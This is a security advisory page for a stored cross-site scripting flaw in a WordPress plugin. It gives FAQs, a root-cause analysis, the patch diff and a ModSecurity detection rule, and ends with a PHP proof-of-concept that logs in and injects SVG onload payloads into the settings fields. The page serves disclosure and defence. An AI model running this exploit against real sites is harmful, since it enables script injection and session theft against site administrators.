What is CVE-2026-6712?

CVE-2026-6712 is a Stored Cross-Site Scripting (XSS) vulnerability in the Website LLMs.txt plugin for WordPress, affecting versions up to 8.2.6. It allows authenticated users with administrator-level permissions to inject malicious scripts into the plugin’s settings, which execute when other users access the affected pages.

Who is affected by this vulnerability?

WordPress installations using the Website LLMs.txt plugin version 8.2.6 or earlier are affected, particularly those that are multi-site setups or have unfiltered_html disabled. Administrators of such sites should verify their plugin version to assess vulnerability.

How can I check if my site is vulnerable?

To check if your site is vulnerable, log in to your WordPress admin dashboard, navigate to the Plugins section, and find the Website LLMs.txt plugin. If the version is 8.2.6 or earlier, your site is vulnerable to CVE-2026-6712.

How can I fix this vulnerability?

The vulnerability is patched in version 8.2.7 of the Website LLMs.txt plugin. To fix the issue, update the plugin to the latest version through the WordPress admin dashboard or manually download the updated version from the official repository.

What are the practical risks associated with this vulnerability?

CVE-2026-6712 has a CVSS score of 4.4, indicating a medium severity level. The primary risk is that an authenticated attacker could inject scripts that execute in the context of other users, potentially leading to unauthorized actions or data exposure.

How does the proof of concept demonstrate the vulnerability?

The proof of concept provided illustrates how an authenticated attacker can exploit the vulnerability by logging into the WordPress admin area and injecting JavaScript into the plugin’s settings. This demonstrates the ease with which an attacker can execute harmful scripts on affected pages.

What is Stored Cross-Site Scripting (XSS)?

Stored Cross-Site Scripting (XSS) occurs when an attacker is able to inject malicious scripts into a web application, which are then stored and executed whenever a user accesses the affected page. This can lead to session hijacking, data theft, and other malicious actions.

What measures can I take to mitigate the risk?

In addition to updating the plugin, consider implementing security measures such as using a web application firewall, limiting admin access, and regularly auditing plugins and themes for vulnerabilities. Educating users about security best practices can also help reduce risks.

What should I do if I cannot update the plugin immediately?

If immediate updating is not feasible, consider disabling the plugin temporarily or restricting access to the admin settings page. Additionally, monitor user activity closely for any suspicious actions until the plugin is updated.

What is the significance of the CVSS score?

The CVSS score provides a standardized way to assess the severity of vulnerabilities. A score of 4.4 indicates moderate risk, suggesting that while exploitation requires specific conditions (like admin access), it still poses a significant threat in certain environments.

How does this vulnerability specifically affect multi-site installations?

In multi-site installations, the vulnerability is particularly concerning because an attacker with admin access can affect multiple sites within the network. This can lead to widespread exploitation if proper safeguards are not in place.

What are the implications of unfiltered_html being disabled?

When unfiltered_html is disabled, it limits the ability of users to input HTML content, which can reduce some risks but does not eliminate the threat posed by this vulnerability. Attackers can still exploit the XSS vulnerability through other unsanitized fields.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : April 24, 2026

CVE-2026-6712: Website LLMs.txt <= 8.2.6 – Authenticated (Admin+) Stored Cross-Site Scripting (website-llms-txt)

CVE ID CVE-2026-6712

Plugin website-llms-txt

Severity Medium (CVSS 4.4)

CWE 79

Vulnerable Version 8.2.6

Patched Version 8.2.7

Disclosed April 19, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-6712: This is a Stored Cross-Site Scripting (XSS) vulnerability in the Website LLMs.txt plugin for WordPress, affecting versions up to and including 8.2.6. The vulnerability resides in the plugin’s admin settings page and allows authenticated attackers with administrator-level permissions to inject arbitrary web scripts that execute whenever a user accesses an affected page. The issue is limited to multi-site installations or environments where unfiltered_html has been disabled, and carries a CVSS score of 4.4.

The root cause is insufficient input sanitization and output escaping across multiple code paths in the admin page (admin/admin-page.php) and the generator class (includes/class-llms-generator.php). Specifically, the vulnerable code uses esc_html() for output within HTML attributes instead of esc_attr(), and fails to escape output in textarea values and hidden input fields. For example, in admin-page.php lines 102-103 and 120-121, the code uses echo esc_html($post_type->labels->name) for the input name attribute, when esc_attr() should be used. Similarly, lines 100-101 for value attributes use echo $settings[‘post_name’][…] without any escaping. The patch also addresses unescaped outputs in generator.php, such as lines 415-419 where llms_txt_title, meta_description, and llms_after_txt_description are output without esc_html() before being written to the llms.txt file.

An attacker with administrator access to a WordPress multi-site or a site with unfiltered_html disabled can exploit this by navigating to the plugin’s settings page (typically at /wp-admin/admin.php?page=llms-settings). The attacker inputs malicious JavaScript payloads into any of the unsanitized fields, such as the post type name label, LLMs.txt title, description, or custom post name fields. For instance, placing a payload like into the “LLMS.txt Title” textarea causes the script to execute when the page is rendered. The injected script is stored in the plugin’s settings (via the llms_generator_settings option) and persists across page loads, infecting all subsequent visits to the settings page.

The patch applies proper escaping functions throughout the affected code. In admin-page.php, the patch replaces esc_html() with esc_attr() for attribute contexts and adds esc_attr() wrapping around value outputs. For textarea values, the patch uses esc_textarea(). In class-llms-generator.php, the patch adds esc_html() to all text content written to the llms.txt output file, such as titles, descriptions, post titles, and permalinks. The patch also sanitizes the GET ‘tab’ parameter with sanitize_key() before output. These changes ensure that user-supplied data is properly escaped for its output context, preventing script injection.

The impact of successful exploitation is the injection and execution of arbitrary JavaScript within the WordPress admin area. This could allow an attacker to perform actions in the context of the victim user, such as creating new administrative accounts, modifying plugin settings, or exfiltrating session cookies. However, since the attack requires administrator-level privileges, the primary threat is cross-site scripting attacks against other administrators or users with access to the settings page, which could lead to privilege escalation or complete site compromise in multi-site environments.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff

--- a/website-llms-txt/admin/admin-page.php
+++ b/website-llms-txt/admin/admin-page.php
@@ -75,7 +75,7 @@
                     <div id="llms-post-types-sortable" class="sortable-list">
                         <?php
                         $post_types = get_post_types(array('public' => true), 'objects');
-                        $ordered_types = array_flip($settings['post_types']); // Create lookup array
+                        $ordered_types = array_flip($settings['post_types'] ?? []); // Create lookup array
                         $unordered_types = array(); // For types not in the current order

                         // Separate ordered and unordered post types
@@ -99,7 +99,7 @@
                                 <div class="sortable-item active" data-post-type="<?php echo esc_attr($post_type->name); ?>">
                                     <label>
                                         <input type="checkbox" name="llms_generator_settings[post_types][]" value="<?php echo esc_attr($post_type->name); ?>" checked>
-                                        <input type="text" name="llms_generator_settings[post_name][<?php echo esc_html($post_type->labels->name); ?>]" value="<?php echo $settings['post_name'][esc_html($post_type->labels->name)] ?? ''  ?>"/>
+                                        <input type="text" name="llms_generator_settings[post_name][<?php echo esc_attr($post_type->labels->name); ?>]" value="<?php echo esc_attr($settings['post_name'][$post_type->labels->name] ?? '')  ?>"/>
                                         <span class="dashicons dashicons-menu"></span>
                                         <?php echo esc_html($post_type->labels->name); ?>
                                         <small style="opacity: 0.7;">(<?php echo intval($indexed_count) . ' indexed of ' . intval($all_count); ?>)</small>
@@ -117,7 +117,7 @@
                             <div class="sortable-item" data-post-type="<?php echo esc_attr($post_type->name); ?>">
                                 <label>
                                     <input type="checkbox" name="llms_generator_settings[post_types][]" value="<?php echo esc_attr($post_type->name); ?>"/>
-                                    <input type="text" name="llms_generator_settings[post_name][<?php echo esc_html($post_type->labels->name); ?>]" value="<?php echo $settings['post_name'][esc_html($post_type->labels->name)] ?? ''  ?>"/>
+                                    <input type="text" name="llms_generator_settings[post_name][<?php echo esc_attr($post_type->labels->name); ?>]" value="<?php echo esc_attr($settings['post_name'][$post_type->labels->name] ?? '')  ?>"/>
                                     <span class="dashicons dashicons-menu"></span>
                                     <?php echo esc_html($post_type->labels->name); ?>
                                     <small style="opacity: 0.7;">(<?php echo intval($indexed_count) . ' indexed of ' . intval($all_count); ?>)</small>
@@ -197,10 +197,10 @@
                             <?php if(in_array($key, ['post_types', 'max_posts', 'max_words', 'include_meta', 'include_excerpts', 'detailed_content', 'include_taxonomies', 'gform_include'])) continue ?>
                             <?php if(is_array($value)): ?>
                                 <?php foreach($value as $second_key => $second_value): ?>
-                                    <input type="hidden" name="llms_generator_settings[<?= $key ?>][]" value="<?= $second_value ?>"/>
+                                    <input type="hidden" name="llms_generator_settings[<?= esc_attr($key) ?>][]" value="<?= esc_attr($second_value) ?>"/>
                                 <?php endforeach ?>
                             <?php else: ?>
-                                <input type="hidden" name="llms_generator_settings[<?= $key ?>]" value="<?= $value ?>"/>
+                                <input type="hidden" name="llms_generator_settings[<?= esc_attr($key) ?>]" value="<?= esc_attr($value) ?>"/>
                             <?php endif ?>
                         <?php endforeach ?>
                     <?php endif ?>
@@ -256,10 +256,10 @@
                             <?php if(in_array($key, ['include_md_file', 'noindex_header', 'llms_allow_indexing', 'update_frequency'])) continue ?>
                             <?php if(is_array($value)): ?>
                                 <?php foreach($value as $second_key => $second_value): ?>
-                                    <input type="hidden" name="llms_generator_settings[<?= $key ?>][]" value="<?= $second_value ?>"/>
+                                    <input type="hidden" name="llms_generator_settings[<?= esc_attr($key) ?>][]" value="<?= esc_attr($second_value) ?>"/>
                                 <?php endforeach ?>
                             <?php else: ?>
-                                <input type="hidden" name="llms_generator_settings[<?= $key ?>]" value="<?= $value ?>"/>
+                                <input type="hidden" name="llms_generator_settings[<?= esc_attr($key) ?>]" value="<?= esc_attr($value) ?>"/>
                             <?php endif ?>
                         <?php endforeach ?>
                     <?php endif ?>
@@ -314,28 +314,28 @@
                         <label>
                             <b><?php esc_html_e('LLMS.txt Title', 'website-llms-txt'); ?></b>
                         </label><br/>
-                        <textarea name="llms_generator_settings[llms_txt_title]" style="width: 100%;height: 40px;"><?php echo (isset($settings['llms_txt_title']) ? $settings['llms_txt_title'] : '') ?></textarea>
+                        <textarea name="llms_generator_settings[llms_txt_title]" style="width: 100%;height: 40px;"><?php echo esc_textarea($settings['llms_txt_title'] ?? '') ?></textarea>
                         <i><?php esc_html_e('Set a custom title for your LLMs.txt file. This will appear at the top of the generated file before any listed URLs.', 'website-llms-txt'); ?></i>
                     </p>
                     <p>
                         <label>
                             <b><?php esc_html_e('LLMS.txt Description', 'website-llms-txt'); ?></b>
                         </label><br/>
-                        <textarea name="llms_generator_settings[llms_txt_description]" style="width: 100%;height: 80px;"><?php echo (isset($settings['llms_txt_description']) ? $settings['llms_txt_description'] : '') ?></textarea>
+                        <textarea name="llms_generator_settings[llms_txt_description]" style="width: 100%;height: 80px;"><?php echo esc_textarea($settings['llms_txt_description'] ?? '') ?></textarea>
                         <i><?php esc_html_e('Optional introduction text added before the list of URLs. Use this to explain the purpose or structure of your LLMs.txt file.', 'website-llms-txt'); ?></i>
                     </p>
                     <p>
                         <label>
                             <b><?php esc_html_e('LLMS.txt After Description', 'website-llms-txt'); ?></b>
                         </label><br/>
-                        <textarea name="llms_generator_settings[llms_after_txt_description]" style="width: 100%;height: 80px;"><?php echo (isset($settings['llms_after_txt_description']) ? $settings['llms_after_txt_description'] : '') ?></textarea>
+                        <textarea name="llms_generator_settings[llms_after_txt_description]" style="width: 100%;height: 80px;"><?php echo esc_textarea($settings['llms_after_txt_description'] ?? '') ?></textarea>
                         <i><?php esc_html_e('Optional text inserted right before the list of links or content entries. You can use it to add additional notes, context, or data usage information before the URLs begin.', 'website-llms-txt'); ?></i>
                     </p>
                     <p>
                         <label>
                             <b><?php esc_html_e('LLMS.txt End File Description', 'website-llms-txt'); ?></b>
                         </label><br/>
-                        <textarea name="llms_generator_settings[llms_end_file_description]" style="width: 100%;height: 80px;"><?php echo (isset($settings['llms_end_file_description']) ? $settings['llms_end_file_description'] : '') ?></textarea>
+                        <textarea name="llms_generator_settings[llms_end_file_description]" style="width: 100%;height: 80px;"><?php echo esc_textarea($settings['llms_end_file_description'] ?? '') ?></textarea>
                         <i><?php esc_html_e('Final text appended at the bottom of the LLMs.txt file (e.g. footer, contact, or disclaimer information).', 'website-llms-txt'); ?></i>
                     </p>
                     <?php if(!empty($settings)): ?>
@@ -343,10 +343,10 @@
                             <?php if(in_array($key, ['llms_txt_title', 'llms_txt_description', 'llms_after_txt_description', 'llms_end_file_description'])) continue ?>
                             <?php if(is_array($value)): ?>
                                 <?php foreach($value as $second_key => $second_value): ?>
-                                    <input type="hidden" name="llms_generator_settings[<?= $key ?>][]" value="<?= $second_value ?>"/>
+                                    <input type="hidden" name="llms_generator_settings[<?= esc_attr($key) ?>][]" value="<?= esc_attr($second_value) ?>"/>
                                 <?php endforeach ?>
                             <?php else: ?>
-                                <input type="hidden" name="llms_generator_settings[<?= $key ?>]" value="<?= $value ?>"/>
+                                <input type="hidden" name="llms_generator_settings[<?= esc_attr($key) ?>]" value="<?= esc_attr($value) ?>"/>
                             <?php endif ?>
                         <?php endforeach ?>
                     <?php endif ?>
@@ -354,11 +354,9 @@
                 </form>
             </div>
         </div>
-        <?php
-            $tab = filter_input(INPUT_GET,'tab');
-        ?>
+        <?php $tab = sanitize_key(filter_input(INPUT_GET, 'tab')); ?>
         <div class="card-column">
-            <div class="card <?php echo $tab; ?>">
+            <div class="card <?php echo esc_attr(sanitize_key($tab)); ?>">
                 <form method="post" action="options.php" id="llms-settings-crawler-form">
                     <?php settings_fields('llms_generator_settings'); ?>
                     <h2><?php esc_html_e('AI Crawler Detection','website-llms-txt') ?></h2>
@@ -383,10 +381,10 @@
                             <?php if(in_array($key, ['llms_local_log_enabled'])) continue ?>
                             <?php if(is_array($value)): ?>
                                 <?php foreach($value as $second_key => $second_value): ?>
-                                    <input type="hidden" name="llms_generator_settings[<?= $key ?>][]" value="<?= $second_value ?>"/>
+                                    <input type="hidden" name="llms_generator_settings[<?= esc_attr($key) ?>][]" value="<?= esc_attr($second_value) ?>"/>
                                 <?php endforeach ?>
                             <?php else: ?>
-                                <input type="hidden" name="llms_generator_settings[<?= $key ?>]" value="<?= $value ?>"/>
+                                <input type="hidden" name="llms_generator_settings[<?= esc_attr($key) ?>]" value="<?= esc_attr($value) ?>"/>
                             <?php endif ?>
                         <?php endforeach ?>
                     <?php endif ?>
--- a/website-llms-txt/includes/class-llms-generator.php
+++ b/website-llms-txt/includes/class-llms-generator.php
@@ -412,13 +412,13 @@
         if(is_a($existing_page,'WP_Post')) {
             $output .= "# Learn more:" . get_permalink($existing_page) . "nn";
         }
-        $output .= "# " . (isset($settings['llms_txt_title']) && $settings['llms_txt_title'] ? $settings['llms_txt_title'] : get_bloginfo('name')) . "nn";
+        $output .= "# " . esc_html((isset($settings['llms_txt_title']) && $settings['llms_txt_title'] ? $settings['llms_txt_title'] : get_bloginfo('name'))) . "nn";
         if ($meta_description) {
-            $output .= "> " . $meta_description . "nn";
+            $output .= "> " . esc_html($meta_description) . "nn";
         }

         if (isset($settings['llms_after_txt_description']) && $settings['llms_after_txt_description']) {
-            $output .= "> " . $settings['llms_after_txt_description'] . "nn";
+            $output .= "> " . esc_html($settings['llms_after_txt_description']) . "nn";
         }
         $output .= "---nn";
         $this->write_file(mb_convert_encoding($output, 'UTF-8', 'UTF-8'));
@@ -465,9 +465,9 @@
             $post_type_obj = get_post_type_object($post_type);
             if (is_object($post_type_obj) && isset($post_type_obj->labels->name)) {

-                $name = $post_type_obj->labels->name;
+                $name = esc_html($post_type_obj->labels->name);
                 if(isset($this->settings['post_name'][$post_type_obj->labels->name]) && $this->settings['post_name'][$post_type_obj->labels->name]) {
-                    $name = $this->settings['post_name'][$post_type_obj->labels->name];
+                    $name = esc_html($this->settings['post_name'][$post_type_obj->labels->name]);
                 }

                 $this->write_file(mb_convert_encoding("n## {$name}nn", 'UTF-8', 'UTF-8'));
@@ -651,7 +651,7 @@

         $settings = apply_filters('get_llms_generator_settings', []);
         if (isset($settings['llms_end_file_description']) && $settings['llms_end_file_description']) {
-            $this->write_file(mb_convert_encoding('> ' . $settings['llms_end_file_description'] . "nn", 'UTF-8', 'UTF-8'));
+            $this->write_file(mb_convert_encoding('> ' . esc_html($settings['llms_end_file_description']) . "nn", 'UTF-8', 'UTF-8'));
             $this->write_file(mb_convert_encoding("n---nn", 'UTF-8', 'UTF-8'));
         }
     }
@@ -903,9 +903,9 @@
                 $description = wp_trim_words(strip_tags($fallback_content), 20, '...');
             }

-            $overview = sprintf("- [%s](%s)%sn", $post->post_title, $permalink, $markdown . ($this->settings['include_excerpts'] && $description ? ': ' . preg_replace('/[x{00A0}x{200B}x{200C}x{200D}x{FEFF}]/u', ' ', $description) : ''));
+            $overview = sprintf("- [%s](%s)%sn", esc_html($post->post_title), esc_url($permalink), esc_html($markdown) . ($this->settings['include_excerpts'] && $description ? ': ' . preg_replace('/[x{00A0}x{200B}x{200C}x{200D}x{FEFF}]/u', ' ', esc_html($description)) : ''));
         } else {
-            $overview = sprintf("- [%s](%s)%sn", $post->post_title, $permalink, $markdown . ($this->settings['include_excerpts'] ? ': ' . preg_replace('/[x{00A0}x{200B}x{200C}x{200D}x{FEFF}]/u', ' ', $description) : ''));
+            $overview = sprintf("- [%s](%s)%sn", esc_html($post->post_title), esc_url($permalink), esc_html($markdown) . ($this->settings['include_excerpts'] ? ': ' . preg_replace('/[x{00A0}x{200B}x{200C}x{200D}x{FEFF}]/u', ' ', esc_html($description)) : ''));
         }

         $show = 1;
@@ -987,7 +987,7 @@
         }

         $excerpts = $this->remove_shortcodes($post->post_excerpt);
-        $custom_txt = get_post_meta($post->ID, '_llmstxt_custom_note', true);
+        $custom_txt = wp_kses_post(get_post_meta($post->ID, '_llmstxt_custom_note', true));
         if($custom_txt) {
             $content = $custom_txt;
         } else {
--- a/website-llms-txt/website-llms-txt.php
+++ b/website-llms-txt/website-llms-txt.php
@@ -2,7 +2,7 @@
 /**
  * Plugin Name: Website LLMs.txt
  * Description: Generates and manages an llms.txt file, a structured, AI-ready index that helps large language models like ChatGPT, Claude, and Perplexity understand your site's most important content.
- * Version: 8.2.6
+ * Version: 8.2.7
  * Author: Ryan Howard
  * Author URI: https://completeseo.com/author/ryan-howard/
  * Text Domain: website-llms-txt
@@ -18,7 +18,7 @@
 }

 // Define plugin constants
-define('LLMS_VERSION', '8.2.6');
+define('LLMS_VERSION', '8.2.7');
 define('LLMS_PLUGIN_FILE', __FILE__);
 define('LLMS_PLUGIN_DIR', plugin_dir_path(__FILE__));
 define('LLMS_PLUGIN_URL', plugin_dir_url(__FILE__));

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-6712
SecRule REQUEST_URI "@streq /wp-admin/admin.php" 
  "id:20261994,phase:2,deny,status:403,chain,msg:'CVE-2026-6712 - Potential XSS via Website LLMs.txt settings',severity:'CRITICAL',tag:'CVE-2026-6712'"
  SecRule ARGS_GET:page "@streq llms-settings" "chain"
    SecRule ARGS_POST:llms_generator_settings.llms_txt_title|ARGS_POST:llms_generator_settings.llms_txt_description|ARGS_POST:llms_generator_settings.llms_after_txt_description|ARGS_POST:llms_generator_settings.llms_end_file_description|ARGS_POST:llms_generator_settings.post_name@rx "(?i)<[^>]*script|(?i)<[^>]*onerror|(?i)<[^>]*onload|(?i)<[^>]*onclick|(?i)javascript:" "t:urlDecode"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
<?php
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-6712 - Website LLMs.txt <= 8.2.6 - Authenticated (Admin+) Stored Cross-Site Scripting

// Configuration
$target_url = 'http://example.com'; // Change this to the target WordPress URL
$admin_username = 'admin';           // Admin username
$admin_password = 'password';        // Admin password

// Initialize cURL session
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);

// Step 1: Authenticate as admin
$login_url = $target_url . '/wp-login.php';
$login_data = [
    'log' => $admin_username,
    'pwd' => $admin_password,
    'rememberme' => 'forever',
    'wp-submit' => 'Log In'
];
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
$response = curl_exec($ch);

// Check for successful login (look for admin bar or redirect)
if (strpos($response, 'admin-bar') === false && strpos(curl_getinfo($ch, CURLINFO_EFFECTIVE_URL), 'wp-admin') === false) {
    echo "[-] Authentication failed. Check credentials.n";
    exit(1);
}
echo "[+] Authenticated successfully.n";

// Step 2: Fetch the settings page to get the nonce (if required)
$settings_url = $target_url . '/wp-admin/admin.php?page=llms-settings';
curl_setopt($ch, CURLOPT_URL, $settings_url);
curl_setopt($ch, CURLOPT_POST, false);
$response = curl_exec($ch);

// Extract nonce (wordpress settings API uses _wpnonce, but we'll use the settings_fields)
$nonce = '';
if (preg_match('/<input[^>]+name="_wpnonce"[^>]+value="([^"]+)"/i', $response, $matches)) {
    $nonce = $matches[1];
    echo "[+] Found nonce: $noncen";
} else {
    echo "[!] No nonce found. Continuing without it (may still work if nonce not checked).n";
}

// Step 3: Craft malicious payload (XSS)
$xss_payload = '"<svg onload=alert(document.domain)>';
// Encoded for injection into various fields
$xss_title = '"<svg onload=alert('XSS_title')>';
$xss_desc = '"<svg onload=alert('XSS_desc')>';

// Step 4: Submit update to inject XSS payload into LLMS.txt Title field
$update_url = $target_url . '/wp-admin/admin.php?page=llms-settings';
$post_data = [
    'option_page' => 'llms_generator_settings',
    'action' => 'update',
    '_wpnonce' => $nonce,
    'llms_generator_settings' => [
        'llms_txt_title' => $xss_title,
        'llms_txt_description' => $xss_desc,
        'llms_after_txt_description' => '',
        'llms_end_file_description' => '',
        'max_posts' => 100,
        'max_words' => 500,
        'include_meta' => 'on',
        'include_excerpts' => 'on',
        'detailed_content' => 'on',
        'include_taxonomies' => 'on',
        'gform_include' => 'on',
        'post_types' => ['post', 'page'],
        'post_name' => ['Posts' => $xss_payload, 'Pages' => ''],
    ]
];

curl_setopt($ch, CURLOPT_URL, $update_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
$response = curl_exec($ch);

// Step 5: Verify the injection by fetching the settings page again
curl_setopt($ch, CURLOPT_URL, $settings_url);
curl_setopt($ch, CURLOPT_POST, false);
$response = curl_exec($ch);

// Check if payload appears in the response (unescaped)
if (strpos($response, '<svg onload') !== false) {
    echo "[+] XSS payload successfully stored and triggered!n";
    echo "[+] The payload "$xss_payload" appears in the page source.n";
} else {
    echo "[-] Payload not found in page source. The patch may have been applied or field not reflected.n";
}

// Close cURL
curl_close($ch);
echo "[+] PoC complete.n";

Frequently Asked Questions

What is CVE-2026-6712?
Overview of the vulnerability
CVE-2026-6712 is a Stored Cross-Site Scripting (XSS) vulnerability in the Website LLMs.txt plugin for WordPress, affecting versions up to 8.2.6. It allows authenticated users with administrator-level permissions to inject malicious scripts into the plugin’s settings, which execute when other users access the affected pages.
Who is affected by this vulnerability?
Identifying vulnerable installations
WordPress installations using the Website LLMs.txt plugin version 8.2.6 or earlier are affected, particularly those that are multi-site setups or have unfiltered_html disabled. Administrators of such sites should verify their plugin version to assess vulnerability.
How can I check if my site is vulnerable?
Steps to verify plugin version
To check if your site is vulnerable, log in to your WordPress admin dashboard, navigate to the Plugins section, and find the Website LLMs.txt plugin. If the version is 8.2.6 or earlier, your site is vulnerable to CVE-2026-6712.
How can I fix this vulnerability?
Updating the plugin
The vulnerability is patched in version 8.2.7 of the Website LLMs.txt plugin. To fix the issue, update the plugin to the latest version through the WordPress admin dashboard or manually download the updated version from the official repository.
What are the practical risks associated with this vulnerability?
Understanding the severity
CVE-2026-6712 has a CVSS score of 4.4, indicating a medium severity level. The primary risk is that an authenticated attacker could inject scripts that execute in the context of other users, potentially leading to unauthorized actions or data exposure.
How does the proof of concept demonstrate the vulnerability?
Explaining the PoC
The proof of concept provided illustrates how an authenticated attacker can exploit the vulnerability by logging into the WordPress admin area and injecting JavaScript into the plugin’s settings. This demonstrates the ease with which an attacker can execute harmful scripts on affected pages.
What is Stored Cross-Site Scripting (XSS)?
Definition and implications
Stored Cross-Site Scripting (XSS) occurs when an attacker is able to inject malicious scripts into a web application, which are then stored and executed whenever a user accesses the affected page. This can lead to session hijacking, data theft, and other malicious actions.
What measures can I take to mitigate the risk?
Best practices for security
In addition to updating the plugin, consider implementing security measures such as using a web application firewall, limiting admin access, and regularly auditing plugins and themes for vulnerabilities. Educating users about security best practices can also help reduce risks.
What should I do if I cannot update the plugin immediately?
Temporary mitigation strategies
If immediate updating is not feasible, consider disabling the plugin temporarily or restricting access to the admin settings page. Additionally, monitor user activity closely for any suspicious actions until the plugin is updated.
What is the significance of the CVSS score?
Understanding CVSS ratings
The CVSS score provides a standardized way to assess the severity of vulnerabilities. A score of 4.4 indicates moderate risk, suggesting that while exploitation requires specific conditions (like admin access), it still poses a significant threat in certain environments.
How does this vulnerability specifically affect multi-site installations?
Impact on multi-site setups
In multi-site installations, the vulnerability is particularly concerning because an attacker with admin access can affect multiple sites within the network. This can lead to widespread exploitation if proper safeguards are not in place.
What are the implications of unfiltered_html being disabled?
Understanding site configurations
When unfiltered_html is disabled, it limits the ability of users to input HTML content, which can reduce some risks but does not eliminate the threat posed by this vulnerability. Attackers can still exploit the XSS vulnerability through other unsanitized fields.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations